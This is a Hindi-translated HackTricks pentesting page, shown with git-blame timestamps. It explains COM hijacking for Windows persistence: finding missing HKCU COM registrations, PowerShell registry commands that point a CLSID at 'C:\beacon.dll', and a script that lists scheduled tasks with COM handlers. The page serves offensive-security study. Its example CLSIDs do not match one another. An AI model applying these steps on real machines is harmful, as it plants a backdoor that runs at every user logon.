hacktricks/windows-hardening/windows-local-privilege-escalation/com-hijacking.md

106 lines
9.3 KiB
Markdown
Raw Normal View History

2023-11-06 08:38:02 +00:00
# COM हाइजैकिंग
2022-08-12 23:51:41 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
2022-08-12 23:51:41 +00:00
</details>
2023-11-06 08:38:02 +00:00
### अस्तित्व में न होने वाले COM components की खोज
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
जैसा कि HKCU के मान उपयोगकर्ताओं द्वारा संशोधित किए जा सकते हैं, **COM हाइजैकिंग** को एक **स्थायी तंत्र** के रूप में उपयोग किया जा सकता है। `procmon` का उपयोग करके ऐसे खोजे गए COM रजिस्ट्री को आसानी से खोजा जा सकता है जो मौजूद नहीं हैं और जिन्हें एक हमलावर स्थायी रूप में बना सकता है। फ़िल्टर:
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
* **RegOpenKey** ऑपरेशन।
* जहां _परिणाम_ **NAME NOT FOUND** है।
* और _पथ_ **InprocServer32** से समाप्त होता है।
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
एक बार जब आपने तय कर लिया है कि कौन सा अस्तित्व में न होने वाला COM अनुकरण करना है, तो निम्नलिखित कमांडों को निष्पादित करें। _सतर्क रहें अगर आप कुछ ही सेकंड में लोड होने वाले COM का अनुकरण करने का निर्णय लेते हैं, क्योंकि यह अत्यधिक हो सकता है।_&#x20;
2022-08-12 23:51:41 +00:00
```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
```
2023-11-06 08:38:02 +00:00
### हाइजैक करने योग्य टास्क स्केड्यूलर COM components
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
विंडोज टास्क वास्तव में कस्टम ट्रिगर्स का उपयोग करके सीओएम ऑब्जेक्ट को कॉल करते हैं। और क्योंकि वे टास्क स्केड्यूलर के माध्यम से निष्पादित होते हैं, इसलिए यह पूर्वानुमान लगाना आसान हो जाता है कि वे कब ट्रिगर होंगे।
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
<pre class="language-powershell"><code class="lang-powershell"># COM CLSIDs दिखाएं
2022-08-12 23:51:41 +00:00
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
2023-11-06 08:38:02 +00:00
if ($Task.Actions.ClassId -ne $null)
{
if ($Task.Triggers.Enabled -eq $true)
{
$usersSid = "S-1-5-32-545"
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
if ($Task.Principal.GroupId -eq $usersGroup)
{
Write-Host "Task Name: " $Task.TaskName
Write-Host "Task Path: " $Task.TaskPath
Write-Host "CLSID: " $Task.Actions.ClassId
Write-Host
}
}
}
2022-08-12 23:51:41 +00:00
}
2023-11-06 08:38:02 +00:00
# नमूना आउटपुट:
2022-08-12 23:51:41 +00:00
<strong># Task Name: Example
</strong># Task Path: \Microsoft\Windows\Example\
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
2023-11-06 08:38:02 +00:00
# [पिछले जैसा और भी अधिक...]</code></pre>
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
आउटपुट की जांच करके आप एक को चुन सकते हैं जो **हर बार जब एक उपयोगकर्ता लॉग इन करता है** को निष्पादित किया जाएगा।
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
अब **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** और HKLM और HKCU में CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** की खोज करते हुए, आपको आमतौर पर पाया जाएगा कि मान HKCU में मौजूद नहीं है।
2022-08-12 23:51:41 +00:00
```bash
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
Name Property
---- --------
InprocServer32 (default) : C:\Windows\system32\some.dll
2023-11-06 08:38:02 +00:00
ThreadingModel : Both
2022-08-12 23:51:41 +00:00
# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
Name Property
---- --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
```
2023-11-06 08:38:02 +00:00
तो, आप बस HKCU प्रविष्टि बना सकते हैं और हर बार जब उपयोगकर्ता लॉग इन करता है, आपका बैकडोर चलेगा।
2022-08-12 23:51:41 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-08-12 23:51:41 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
2022-08-12 23:51:41 +00:00
</details>